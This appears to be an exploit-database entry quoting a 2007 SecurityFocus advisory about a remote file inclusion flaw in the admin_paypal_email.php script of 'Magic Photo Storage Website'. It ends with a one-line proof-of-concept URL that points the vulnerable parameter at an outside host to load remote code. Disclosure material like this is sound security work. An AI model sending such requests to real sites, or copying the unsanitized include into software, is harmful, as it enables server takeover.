Magic Photo Storage Website - adminadmin_paypal_email.php?_config[site_path] Remote File Inclusion

2007-01-09T00:00:00
ID EXPLOITPACK:A5627E4177D7686DB7AABBAFEF7A9F64
Type exploitpack
Reporter IbnuSina
Modified 2007-01-09T00:00:00

Description

Magic Photo Storage Website - adminadmin_paypal_email.php?_config[site_path] Remote File Inclusion

                                        
                                            source: https://www.securityfocus.com/bid/21965/info
    
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
    
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

http://www.example.com/path/admin/admin_paypal_email.php?_config[site_path]=http://www.example2.com